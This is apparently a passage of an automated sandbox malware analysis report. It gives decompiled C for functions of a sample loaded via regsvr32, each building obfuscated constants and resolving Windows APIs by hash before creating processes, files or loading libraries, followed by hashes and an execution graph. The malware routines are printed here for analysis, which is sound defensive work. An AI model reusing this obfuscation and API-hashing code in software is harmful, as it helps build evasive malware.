				_v20 = _v20 + 0xe8c2;
				_v20 = _v20 ^ 0x00a70f96;
				_v12 = 0x20815c;
				_t66 = 0x4c;
				_v12 = _v12 / _t66;
				_v12 = _v12 | 0xbbf973da;
				_v12 = _v12 ^ 0xbbf5b48f;
				E0058BFF0(0xac802c42, 0x58, _t66, _t66, 0xb43c22a7);
				_t64 = CreateProcessW(_a64, _a40, 0, 0, _a48, _a8, 0, 0, _a16, _t72); // executed
				return _t64;
			}











                                                                                                                0x005846e8
                                                                                                                0x005846ed
                                                                                                                0x005846ef
                                                                                                                0x005846f2
                                                                                                                0x005846f5
                                                                                                                0x005846f8
                                                                                                                0x005846f9
                                                                                                                0x005846fc
                                                                                                                0x005846ff
                                                                                                                0x00584702
                                                                                                                0x00584703
                                                                                                                0x00584706
                                                                                                                0x00584709
                                                                                                                0x0058470c
                                                                                                                0x0058470d
                                                                                                                0x00584710
                                                                                                                0x00584713
                                                                                                                0x00584716
                                                                                                                0x00584717
                                                                                                                0x00584719
                                                                                                                0x0058471e
                                                                                                                0x00584727
                                                                                                                0x0058472e
                                                                                                                0x00584732
                                                                                                                0x00584739
                                                                                                                0x00584740
                                                                                                                0x00584747
                                                                                                                0x0058474e
                                                                                                                0x00584755
                                                                                                                0x0058475c
                                                                                                                0x00584763
                                                                                                                0x0058476a
                                                                                                                0x00584771
                                                                                                                0x0058477d
                                                                                                                0x00584783
                                                                                                                0x00584786
                                                                                                                0x0058478d
                                                                                                                0x005847ae
                                                                                                                0x005847ca
                                                                                                                0x005847d1

                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,90E3102D,00000000,00000000,00000000), ref: 005847CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
                                                                                                                • Instruction ID: e0d9cf658f3cd2791bffab1c4af40da04a061c954fc76d3268d9b9ef87fa0e55
                                                                                                                • Opcode Fuzzy Hash: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
                                                                                                                • Instruction Fuzzy Hash: 8131E372900248BBDF559F95DD09CDEBF79FB89314F008148FA2462120D7769A60EB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058BF1C Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 55%
                                                                                                                			E0058BF1C(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, WCHAR* _a20, long _a24, long _a36, intOrPtr _a40) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				void* _t55;
				long _t60;

				_push(_a40);
				_t60 = __edx;
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00579E7D(_t47);
				_v20 = 0x8eb723;
				_v20 = _v20 + 0xdb15;
				_v20 = _v20 ^ 0x00852a30;
				_v16 = 0x113147;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x0008263d;
				_v12 = 0x276480;
				_v12 = _v12 + 0x6f6f;
				_v12 = _v12 | 0x7ba60f09;
				_v12 = _v12 * 0x1e;
				_v12 = _v12 ^ 0x7da9aca6;
				_v8 = 0x62f42b;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x000dc6a5;
				E0058BFF0(0xac802c42, 0xfa, __ecx, __ecx, 0xbf3d9e5c);
				_t55 = CreateFileW(_a20, _a36, _a12, 0, _t60, _a24, 0); // executed
				return _t55;
			}










                                                                                                                0x0058bf24
                                                                                                                0x0058bf29
                                                                                                                0x0058bf2b
                                                                                                                0x0058bf2e
                                                                                                                0x0058bf2f
                                                                                                                0x0058bf30
                                                                                                                0x0058bf33
                                                                                                                0x0058bf36
                                                                                                                0x0058bf39
                                                                                                                0x0058bf3c
                                                                                                                0x0058bf3f
                                                                                                                0x0058bf42
                                                                                                                0x0058bf43
                                                                                                                0x0058bf44
                                                                                                                0x0058bf49
                                                                                                                0x0058bf53
                                                                                                                0x0058bf5a
                                                                                                                0x0058bf61
                                                                                                                0x0058bf68
                                                                                                                0x0058bf6c
                                                                                                                0x0058bf70
                                                                                                                0x0058bf77
                                                                                                                0x0058bf7e
                                                                                                                0x0058bf85
                                                                                                                0x0058bf9c
                                                                                                                0x0058bfa4
                                                                                                                0x0058bfab
                                                                                                                0x0058bfb2
                                                                                                                0x0058bfb6
                                                                                                                0x0058bfba
                                                                                                                0x0058bfbe
                                                                                                                0x0058bfd1
                                                                                                                0x0058bfe8
                                                                                                                0x0058bfef

                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,00852A30,00000000,00050E56,?,00000000), ref: 0058BFE8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
                                                                                                                • Instruction ID: 4f2f753ea4d406c5ab6abc17e4d2f63624f0a4d52acce23623ad243ac977a079
                                                                                                                • Opcode Fuzzy Hash: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
                                                                                                                • Instruction Fuzzy Hash: 4421E57680020DBBCF15DF96D9498DFBFB5FB84748F108198F925A2220D3B68A64DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00581B22 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00581B22(long __ecx, void* __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t44;
				void* _t55;
				signed int _t57;
				void* _t62;
				long _t63;

				_push(_a16);
				_t62 = __edx;
				_t63 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00579E7D(_t44);
				_v12 = 0x22ab7;
				_t57 = 0x25;
				_v12 = _v12 * 0x37;
				_v12 = _v12 / _t57;
				_v12 = _v12 + 0xd1d9;
				_v12 = _v12 ^ 0x00090b04;
				_v16 = 0xc8cc57;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 + 0xffff2520;
				_v16 = _v16 ^ 0xfffe92e9;
				_v20 = 0xc52a4b;
				_v20 = _v20 | 0xae757bf4;
				_v20 = _v20 ^ 0xaef18991;
				_v8 = 0xf15120;
				_v8 = _v8 ^ 0xeebb54a4;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x37;
				_v8 = _v8 ^ 0xf39e7cda;
				E0058BFF0(0xac802c42, 0xa7, _t57, _t57, 0x96a08a4a);
				_t55 = RtlAllocateHeap(_t62, _t63, _a8); // executed
				return _t55;
			}












                                                                                                                0x00581b2a
                                                                                                                0x00581b2d
                                                                                                                0x00581b2f
                                                                                                                0x00581b31
                                                                                                                0x00581b34
                                                                                                                0x00581b37
                                                                                                                0x00581b3a
                                                                                                                0x00581b3b
                                                                                                                0x00581b3c
                                                                                                                0x00581b41
                                                                                                                0x00581b50
                                                                                                                0x00581b54
                                                                                                                0x00581b61
                                                                                                                0x00581b64
                                                                                                                0x00581b6b
                                                                                                                0x00581b72
                                                                                                                0x00581b79
                                                                                                                0x00581b7d
                                                                                                                0x00581b84
                                                                                                                0x00581b8b
                                                                                                                0x00581b92
                                                                                                                0x00581b99
                                                                                                                0x00581ba0
                                                                                                                0x00581ba7
                                                                                                                0x00581bae
                                                                                                                0x00581bc2
                                                                                                                0x00581bc5
                                                                                                                0x00581bd8
                                                                                                                0x00581be5
                                                                                                                0x00581bec

                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,005D2A08,FFFE92E9,?,?,?,?,?,?,?,?,00E39F9A,?), ref: 00581BE5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
                                                                                                                • Instruction ID: cd86edd998d56f6c13e6ac4fe4f3a7788533af28c728f756d10db61017d9a264
                                                                                                                • Opcode Fuzzy Hash: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
                                                                                                                • Instruction Fuzzy Hash: A82132B5D00208FBDF05DFA5C94A8EEBFB5FB80314F108089E914A6261D3B45B41DF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 005866C2 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E005866C2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				intOrPtr* _t45;
				void* _t46;
				void* _t51;

				_t51 = __edx;
				E00579E7D(_t39);
				_v12 = 0xe2acc8;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xbe17;
				_v12 = _v12 ^ 0x0011993b;
				_v20 = 0xf2f568;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0xbd5142c5;
				_v8 = 0x6d1128;
				_v8 = _v8 + 0xffff2279;
				_v8 = _v8 << 3;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x19de445b;
				_v16 = 0xb26540;
				_v16 = _v16 + 0xffff3889;
				_v16 = _v16 ^ 0x00b459c6;
				_t45 = E0058BFF0(0xee7aaf55, 0x326, __ecx, __ecx, 0x1d46c800);
				_t46 =  *_t45(0, _a20, 0, _a8, _t51, __ecx, __edx, _a4, _a8, 0, 0, _a20, _a24, _a28, _a32); // executed
				return _t46;
			}











                                                                                                                0x005866cf
                                                                                                                0x005866e4
                                                                                                                0x005866e9
                                                                                                                0x005866f3
                                                                                                                0x005866f7
                                                                                                                0x005866fe
                                                                                                                0x00586705
                                                                                                                0x0058670c
                                                                                                                0x00586710
                                                                                                                0x00586717
                                                                                                                0x0058671e
                                                                                                                0x00586725
                                                                                                                0x00586729
                                                                                                                0x0058672d
                                                                                                                0x00586734
                                                                                                                0x0058673b
                                                                                                                0x00586742
                                                                                                                0x00586766
                                                                                                                0x00586777
                                                                                                                0x0058677e

                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,060C7659,00000000,00B459C6,?), ref: 00586777
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
                                                                                                                • Instruction ID: 9795ba84f9b76a0b65f46000c5467e785a8c5da4a80aac4d71f9c3cdbcf10291
                                                                                                                • Opcode Fuzzy Hash: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
                                                                                                                • Instruction Fuzzy Hash: 941144B2800209FBCF15DF95CC0A8DEBFB8FF85304F108198E92962210D3B18A64DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0057FCB5 Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E0057FCB5(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t36;
				struct HINSTANCE__* _t47;
				signed int _t49;
				signed int _t50;
				WCHAR* _t57;

				_push(_a4);
				_t57 = __edx;
				_push(__edx);
				E00579E7D(_t36);
				_v20 = 0x4781cd;
				_t49 = 7;
				_v20 = _v20 / _t49;
				_v20 = _v20 ^ 0x0004a997;
				_v8 = 0x9f6121;
				_v8 = _v8 | 0x04abbfea;
				_v8 = _v8 ^ 0x44133d53;
				_v8 = _v8 ^ 0x40a32c45;
				_v16 = 0x791f5b;
				_t50 = 0x6e;
				_v16 = _v16 / _t50;
				_v16 = _v16 ^ 0x000d135a;
				_v12 = 0x90c5d0;
				_v12 = _v12 ^ 0x2cafc93f;
				_v12 = _v12 ^ 0x2c381e09;
				E0058BFF0(0xac802c42, 0x347, _t50, _t50, 0xede26741);
				_t47 = LoadLibraryW(_t57); // executed
				return _t47;
			}












                                                                                                                0x0057fcbc
                                                                                                                0x0057fcbf
                                                                                                                0x0057fcc1
                                                                                                                0x0057fcc3
                                                                                                                0x0057fcc8
                                                                                                                0x0057fcd6
                                                                                                                0x0057fcdb
                                                                                                                0x0057fce0
                                                                                                                0x0057fce7
                                                                                                                0x0057fcee
                                                                                                                0x0057fcf5
                                                                                                                0x0057fcfc
                                                                                                                0x0057fd03
                                                                                                                0x0057fd0d
                                                                                                                0x0057fd13
                                                                                                                0x0057fd16
                                                                                                                0x0057fd1d
                                                                                                                0x0057fd24
                                                                                                                0x0057fd2b
                                                                                                                0x0057fd4f
                                                                                                                0x0057fd58
                                                                                                                0x0057fd5e

                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 0057FD58
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
                                                                                                                • Instruction ID: f693ba9b46c169cdccc511a9151447d22b4167d72faa0ee6678c04fffa9efa1d
                                                                                                                • Opcode Fuzzy Hash: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
                                                                                                                • Instruction Fuzzy Hash: 02112E75D00218EBDB18DFA5D84A8EEBFB9EB44304F10C189E429A6251DBB56B148B91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00579EA8 Relevance: 1.5, APIs: 1, Instructions: 44fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E00579EA8(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t35;
				int _t42;
				WCHAR* _t46;

				_push(_a8);
				_t46 = __ecx;
				_push(_a4);
				_push(__ecx);
				E00579E7D(_t35);
				_v20 = 0xb0cce;
				_v20 = _v20 + 0xffff00ee;
				_v20 = _v20 ^ 0x0007bd05;
				_v12 = 0x1e8fca;
				_v12 = _v12 >> 6;
				_v12 = _v12 << 8;
				_v12 = _v12 + 0xffff1da9;
				_v12 = _v12 ^ 0x0077171f;
				_v16 = 0xc679b7;
				_v16 = _v16 + 0x38bf;
				_v16 = _v16 ^ 0x00cf762a;
				_v8 = 0xa3ba51;
				_v8 = _v8 ^ 0xa0d3ead1;
				_v8 = _v8 + 0xe688;
				_v8 = _v8 + 0xffff6d73;
				_v8 = _v8 ^ 0xa079263d;
				E0058BFF0(0xac802c42, 0x385, __ecx, __ecx, 0x77e9f533);
				_t42 = DeleteFileW(_t46); // executed
				return _t42;
			}










                                                                                                                0x00579eaf
                                                                                                                0x00579eb2
                                                                                                                0x00579eb4
                                                                                                                0x00579eb8
                                                                                                                0x00579eb9
                                                                                                                0x00579ebe
                                                                                                                0x00579ec8
                                                                                                                0x00579ecf
                                                                                                                0x00579ed6
                                                                                                                0x00579edd
                                                                                                                0x00579ee1
                                                                                                                0x00579ee5
                                                                                                                0x00579eec
                                                                                                                0x00579ef3
                                                                                                                0x00579efa
                                                                                                                0x00579f01
                                                                                                                0x00579f08
                                                                                                                0x00579f0f
                                                                                                                0x00579f16
                                                                                                                0x00579f1d
                                                                                                                0x00579f24
                                                                                                                0x00579f48
                                                                                                                0x00579f51
                                                                                                                0x00579f57

                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00E39F9E,00000000), ref: 00579F51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 4033686569-0
                                                                                                                • Opcode ID: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
                                                                                                                • Instruction ID: b45158ee1e84531d91aea40301993c08f3e2436f424bdb46f1077d9ea384dee9
                                                                                                                • Opcode Fuzzy Hash: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
                                                                                                                • Instruction Fuzzy Hash: D91118B1C11619EBDF48DFA4D94A8DEBBB8FF10318F108288E825A6250E7B45B549F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0057BA9C Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E0057BA9C(int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t34;

				_v20 = 0x6b4597;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x00116e69;
				_v16 = 0x7d3df7;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x03ee9fa4;
				_v12 = 0x7e0c35;
				_v12 = _v12 ^ 0xa2581e84;
				_v12 = _v12 ^ 0xa22bc007;
				_v8 = 0xada9ee;
				_push(_t34);
				_v8 = _v8 * 0x61;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x6b103fde;
				E0058BFF0(0xac802c42, 0x166, _t34, _t34, 0x80a33dd2);
				ExitProcess(_a12);
			}








                                                                                                                0x0057baa2
                                                                                                                0x0057baa9
                                                                                                                0x0057baad
                                                                                                                0x0057bab4
                                                                                                                0x0057babb
                                                                                                                0x0057babf
                                                                                                                0x0057bac6
                                                                                                                0x0057bacd
                                                                                                                0x0057bad4
                                                                                                                0x0057badb
                                                                                                                0x0057bae6
                                                                                                                0x0057baee
                                                                                                                0x0057baf6
                                                                                                                0x0057bafa
                                                                                                                0x0057bb12
                                                                                                                0x0057bb1d

                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(00116E69), ref: 0057BB1D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 621844428-0
                                                                                                                • Opcode ID: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
                                                                                                                • Instruction ID: ededd5ed7f021805f1beedc813203e784e5de74c6cef3b2848e4f4118dbf0cb7
                                                                                                                • Opcode Fuzzy Hash: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
                                                                                                                • Instruction Fuzzy Hash: 07010475D1120CEB8B04DFA4CA4A9DEBBB4FF04348F108599E821B7211D7B55B04CF81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:16.7%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:1056
                                                                                                                Total number of Limit Nodes:17
                                                                                                                execution_graph 5106 1c72cc 5107 1cffde GetPEB 5106->5107 5108 1c750d 5107->5108 5109 1d589f GetPEB 5108->5109 5110 1c7520 5109->5110 5111 1c4bb4 2 API calls 5110->5111 5118 1c758b 5110->5118 5112 1c753e 5111->5112 5113 1d734a GetPEB 5112->5113 5114 1c7568 5113->5114 5115 1cb9d7 GetPEB 5114->5115 5116 1c7577 5115->5116 5117 1c9ea8 2 API calls 5116->5117 5117->5118 3845 1ce1a9 3850 1d1fd0 3845->3850 3847 1ce295 3887 1cba9c 3847->3887 3849 1ce2ab 3884 1d33d3 3850->3884 3853 1d3cc9 4100 1c8c7c 3853->4100 3857 1dacff RtlAllocateHeap GetPEB 3857->3884 3864 1d3cb3 4090 1cc7d1 3864->4090 3871 1c6a8d GetPEB 3871->3884 3872 1ce080 RtlAllocateHeap GetPEB 3872->3884 3878 1d3ca3 3878->3847 3884->3853 3884->3857 3884->3864 3884->3871 3884->3872 3884->3878 3886 1cb9d7 GetPEB 3884->3886 3890 1d0418 3884->3890 3900 1dd14c 3884->3900 3914 1cb4fc 3884->3914 3921 1c4700 3884->3921 3931 1c6cbb 3884->3931 3943 1cbe09 3884->3943 3954 1c66b0 3884->3954 3962 1d882f 3884->3962 3975 1d158a 3884->3975 3979 1d5497 3884->3979 3986 1cda93 3884->3986 3990 1c4cb9 3884->3990 3994 1dd6b1 3884->3994 4002 1dafb0 3884->4002 4011 1de612 3884->4011 4017 1d519b 3884->4017 4020 1dec9b 3884->4020 4026 1dc535 3884->4026 4037 1c1b09 3884->4037 4047 1deba2 3884->4047 4052 1ddad8 3884->4052 4056 1db2fc 3884->4056 4059 1dbaf2 3884->4059 4070 1c30be 3884->4070 4075 1dc16b 3884->4075 4085 1c5995 3884->4085 3886->3884 3888 1dbff0 GetPEB 3887->3888 3889 1cbb17 ExitProcess 3888->3889 3889->3849 3895 1d073f 3890->3895 3894 1d0871 4137 1c9574 3894->4137 3895->3894 3899 1d086f 3895->3899 4114 1da98e 3895->4114 4118 1d66c2 3895->4118 4122 1c32b5 3895->4122 4126 1c4e77 3895->4126 4132 1deaa3 3895->4132 3899->3884 3913 1dd4fd 3900->3913 3903 1dd67f 4210 1c6a8d 3903->4210 3905 1dd538 4202 1cd5cb 3905->4202 3909 1dd557 3909->3884 3910 1deaa3 RtlAllocateHeap GetPEB 3910->3913 3911 1c6a8d GetPEB 3911->3909 3913->3903 3913->3905 3913->3909 3913->3910 4190 1c4bb4 3913->4190 4194 1cd68b 3913->4194 4198 1cc706 3913->4198 4206 1cb9d7 3913->4206 3919 1cb7a3 3914->3919 3915 1c32b5 2 API calls 3915->3919 3916 1cb8ea 3916->3884 3918 1da98e CloseServiceHandle GetPEB 3918->3919 3919->3915 3919->3916 3919->3918 4220 1cc4eb 3919->4220 4224 1d1070 3919->4224 3925 1c49df 3921->3925 3922 1c9574 GetPEB 3922->3925 3923 1c4bb4 2 API calls 3923->3925 3925->3922 3925->3923 3926 1c4a0b 3925->3926 3929 1c4a21 3925->3929 3930 1cb9d7 GetPEB 3925->3930 4238 1e110e 3925->4238 4252 1d734a 3925->4252 4228 1cd346 3926->4228 3929->3884 3930->3925 4283 1c588d 3931->4283 3933 1c7204 3933->3933 3934 1c4bb4 RtlAllocateHeap GetPEB 3937 1c70ab 3934->3937 3935 1c70da 3936 1e110e 2 API calls 3935->3936 3939 1c70fb 3936->3939 3937->3933 3937->3934 3937->3935 3940 1d734a GetPEB 3937->3940 3942 1cb9d7 GetPEB 3937->3942 4286 1cf2b9 3937->4286 4289 1d1bed 3937->4289 3939->3884 3940->3937 3942->3937 3951 1cc23f 3943->3951 3945 1c4bb4 2 API calls 3945->3951 3946 1cc431 4305 1de373 3946->4305 3948 1cc42f 3948->3884 3949 1d734a GetPEB 3949->3951 3951->3945 3951->3946 3951->3948 3951->3949 3953 1cb9d7 GetPEB 3951->3953 4293 1cf1d5 3951->4293 4297 1dbf1c 3951->4297 4301 1d18f7 3951->4301 3953->3951 3956 1c6937 3954->3956 3955 1dbf1c 2 API calls 3955->3956 3956->3955 3957 1c6a80 3956->3957 3959 1c9574 GetPEB 3956->3959 3960 1d18f7 GetPEB 3956->3960 3961 1de373 2 API calls 3956->3961 4309 1dba34 3956->4309 3957->3884 3959->3956 3960->3956 3961->3956 3963 1d8f07 3962->3963 3965 1d915b 3963->3965 3966 1d66c2 2 API calls 3963->3966 3968 1c32b5 2 API calls 3963->3968 3969 1d9159 3963->3969 3970 1c4bb4 2 API calls 3963->3970 3971 1da98e 2 API calls 3963->3971 3973 1d1bed GetPEB 3963->3973 3974 1cb9d7 GetPEB 3963->3974 4313 1c3511 3963->4313 4326 1c40d2 3963->4326 3967 1da98e 2 API calls 3965->3967 3966->3963 3967->3969 3968->3963 3969->3884 3970->3963 3971->3963 3973->3963 3974->3963 3976 1d15a4 3975->3976 3977 1d09f9 LoadLibraryW RtlAllocateHeap GetPEB 3976->3977 3978 1d16a8 3976->3978 3977->3976 3978->3884 3981 1d54b9 3979->3981 3980 1d587a 3983 1c4627 GetPEB 3980->3983 3981->3980 3982 1d5878 3981->3982 3985 1deaa3 2 API calls 3981->3985 4342 1c4627 3981->4342 3982->3884 3983->3982 3985->3981 3987 1cdaa9 3986->3987 3988 1dbff0 GetPEB 3987->3988 3989 1cdb4e 3988->3989 3989->3884 3991 1c4cd5 3990->3991 3992 1dbff0 GetPEB 3991->3992 3993 1c4d6f 3992->3993 3993->3884 4000 1dd91e 3994->4000 3997 1dda08 3997->3884 3998 1c4bb4 2 API calls 3998->4000 3999 1d734a GetPEB 3999->4000 4000->3997 4000->3998 4000->3999 4001 1cb9d7 GetPEB 4000->4001 4354 1cffde 4000->4354 4358 1d5d68 4000->4358 4001->4000 4005 1dafca 4002->4005 4003 1deaa3 2 API calls 4003->4005 4004 1db130 4006 1c6a8d GetPEB 4004->4006 4005->4003 4005->4004 4008 1db12e 4005->4008 4382 1cc5c3 4005->4382 4386 1d5031 4005->4386 4390 1e225a 4005->4390 4006->4008 4008->3884 4013 1de794 4011->4013 4015 1deaa3 2 API calls 4013->4015 4016 1de822 4013->4016 4510 1e032a 4013->4510 4514 1daa59 4013->4514 4015->4013 4016->3884 4018 1deaa3 2 API calls 4017->4018 4019 1d51d5 4018->4019 4019->3884 4022 1dee36 4020->4022 4023 1def0f 4022->4023 4025 1cffde GetPEB 